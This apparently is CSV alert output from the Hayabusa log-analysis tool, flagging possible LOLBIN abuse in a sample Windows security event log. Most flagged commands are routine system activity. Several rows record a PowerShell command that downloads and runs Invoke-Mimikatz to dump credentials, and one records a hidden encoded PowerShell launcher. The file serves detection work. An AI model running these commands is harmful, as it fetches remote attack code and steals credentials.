IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:49:42.000 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0x708 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:50:40.032 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" Command | Path: C:\Windows\System32\findstr.exe | PID: 0x6e0 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:53:47.579 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: 
C:\Windows\System32\findstr.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:54:04.375 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0xb78 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:59:07.782 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" csc | Path: C:\Windows\System32\findstr.exe | PID: 0x9c8 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 08:01:26.782 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 08:01:26.782 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x5b8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:03:05.916 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x108 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:03:06.884 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc34 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:03:06.931 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xfcc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:03:25.697 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6fc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x764 | User: IEUser 
| LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:23:21.642 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xe54 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:23:21.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x500 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:23:21.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:25:21.642 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | 
PID: 0x7d4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:38:00.158 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc60 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 05:43:45.656 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x318 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 05:43:48.234 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x488 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 05:44:06.459 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x64c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 05:46:45.647 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd 
Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb5c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 05:58:45.022 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x780 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 05:58:46.850 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Users\IEUser\Desktop\launcher.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0x9c0 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 05:58:46.881 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc 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 | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe0 | User: IEUser | LID: 0x4d011,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 05:58:46.881 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa48 | User: IEUser | LID: 
0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 06:11:59.064 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\gpedit.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf20 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 07:17:58.251 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x500 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 07:17:58.259 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xa9c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:34:50.038 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x700 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:34:50.394 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement 
Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb98 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:34:51.064 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xed8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:34:51.099 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9e4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:36:35.595 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x42c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:38:39.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa04 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:38:44.366 +09:00,IE10Win7,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeb8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:38:58.135 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfa8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:54:34.003 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xa5c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:54:34.019 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x77c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:54:34.030 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 
0xbd4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:56:33.997 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xcd0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 09:49:33.186 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb80 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 09:49:33.198 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:20:56.600 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x550 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:20:56.608 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows 
defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:20:57.729 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x428 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:20:57.955 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:21:00.750 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb78 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:21:00.752 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x734 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:21:00.760 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xf94 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:22:11.163 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb20 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:22:11.319 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeac | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: IEUser | LID: 
0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:31:37.371 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3b4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:31:37.402 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde8 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus 
